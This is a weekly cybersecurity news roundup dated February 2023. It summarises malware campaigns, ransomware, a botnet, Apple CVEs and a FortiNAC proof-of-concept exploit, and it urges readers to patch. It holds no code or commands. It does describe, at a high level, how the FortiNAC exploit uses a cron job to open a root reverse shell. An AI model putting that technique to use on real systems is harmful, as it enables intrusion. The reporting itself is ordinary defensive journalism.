SAN MATEO, CA, February 27, 2023 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Brought to you by NetworkTigers.
- Mining malware delivered via pirated copies of Apple’s Final Cut Pro
- S1deload Stealer takes over Facebook and YouTube accounts, mines for crypto
- Lazarus Group believed to be using new WinorDLL64 backdoor exploit
- Hackers are mimicking ChatGPT to spread credential stealing Fobo trojan
- Fortinet FortiNAC exploit created, users urged to upgrade ASAP
- Apple reports three new iPhone, iPad and Mac OS vulnerabilities
- HardBit ransomware demands insurance details to determine ransom price
- MyloBot botnet spreading to more than 50,000 devices by the day
- Earth Kitsune espionage group deploys new WhiskerSpy backdoor
Mining malware delivered via pirated copies of Apple’s Final Cut Pro
Torrented versions of Apple’s Final Cut Pro video editing software have been found to hide the XMRig cryptocurrency mining malware. Researchers have determined that the hidden malware is an upgraded version with features making it especially difficult to detect, such as its use of the Invisible Internet Protocol (i2p). “I2p is a private network layer that offers users a similar kind of anonymity as that offered by The Onion Router (Tor) network.” Researchers have determined that the person responsible for uploading the weaponized version of the software has a history of providing Apple products harboring the same cryptominer. Read more.
S1deload Stealer takes over Facebook and YouTube accounts, mines for crypto
S1deload Stealer is a new malware that hijacks victims’ Facebook or YouTube account after they click a malicious link that leads to an executable file. Once it is installed, the malware can perform several functions. Aside from exfiltrating login credentials, S1deload Stealer can mine for BEAM cryptocurrency or artificially boost the victim’s post count. It can also scan the victim’s account to see if they are an admin on a Facebook page or group that can be used as a platform to spam further links and ensnare more victims. Read more.
Lazarus Group believed to be using new WinorDLL64 backdoor exploit
Researchers believe that North Korean hacking collective Lazarus Group is exfiltrating data from victims using WinorDLL64, “a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine.” Victims thus far have been highly targeted, with WinorDLL64 being used against targets in North America, the Middle East and Central Europe. Lazarus is being implicated in the hacks because of similarities shared between the group’s previous tools and the new malware’s code and behavior. Read more.
Hackers are mimicking ChatGPT to spread credential stealing Fobo trojan
With the popularity of ChatGPT has come scam attempts. Criminals are using social media accounts to create fake content that either purports to come from ChatGPT’s developers or from communities that are fans of the AI chatbot. Posts feature content about ChatGPT and include a link that leads victims to a perfectly crafted fraudulent landing page where a click of the “download” button will result in the installation of a trojan that scans for social media or email login credentials. Read more.
Fortinet FortiNAC exploit created, users urged to upgrade ASAP
Horizon3 security researchers have created a proof-of-concept exploit for vulnerability CVE-2022-39952 in Fortinet’s FortiNAC that allows for remote code execution. The exploit requires the writing of “a cron job to /etc/cron.d/ that triggers every minute to initiate a root reverse shell to the attacker.” Code for the proof-of-concept exploit is available on GitHub where it can potentially be weaponized by threat actors or used by administrators to create better network defenses. FortiNAC users are urged to upgrade to version 9.4.1 or later, 9.2.6 or above, 9.1.8 or newer and 7.2.0 or later, as these are not affected by the flaw. Read more.
Apple reports three new iPhone, iPad and Mac OS vulnerabilities
Three new vulnerabilities have been reported by Apple that affect MacOS, iOS and iPadOS. The vulnerabilities have been added to a security advisory detailed last month and can allow an attacker to install applications on the compromised device or erase its content completely. One flaw is a “race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root.” The other two flaws (CVE-2023-23530 and CVE-2023-23531) exist within the Foundation framework. The flaws have been patched in the latest OS versions and all Apple users are urged to update immediately. Read more.
HardBit ransomware demands insurance details to determine ransom price
Operators of HardBit ransomware are taking a novel approach to ransom negotiations: demanding insurance details from victims to calculate a payment that their insurer will be able to cover. Framing insurance providers as the real villain in this scenario, HardBit tells victims that insurers do not negotiate on behalf of their customers and that disclosing information to them is the only way to retrieve files. HardBit encrypts target data quickly and is difficult for administrators to recover files from because it adds itself to the Windows Startup folder to establish persistence, disables Windows Defender features and opens victims’ files to overwrite their content with encrypted data. Read more.
MyloBot botnet spreading to more than 50,000 devices by the day
Devices in the US, India, Iran and Indonesia are falling victim to the MyloBot botnet at the rate of over 50,000 machines a day according to findings from researchers at BitSight. MyloBot is uniquely dangerous because it remains inactive for 14 days after taking hold to avoid detection. It can also download and execute any payload once installed, allowing it to launch any type of malware an attacker chooses to deploy. in 2022, for example, MyloBot was observed sending extortion emails from compromised endpoints. Read more.
Earth Kitsune espionage group deploys new WhiskerSpy backdoor
Cyber espionage group Earth Kitsune has been observed orchestrating a social engineering campaign using a new backdoor called WhiskySpy. Earth Kitsune baits users into visiting pro-North Korea websites compromised with WhiskySpy, the backdoor is only installed on the victims’ machines with IP addresses specific to certain regions in Japan, Brazil and China. Another unusual campaign characteristic is targeting vulnerable individuals instead of companies or organizations. Read more.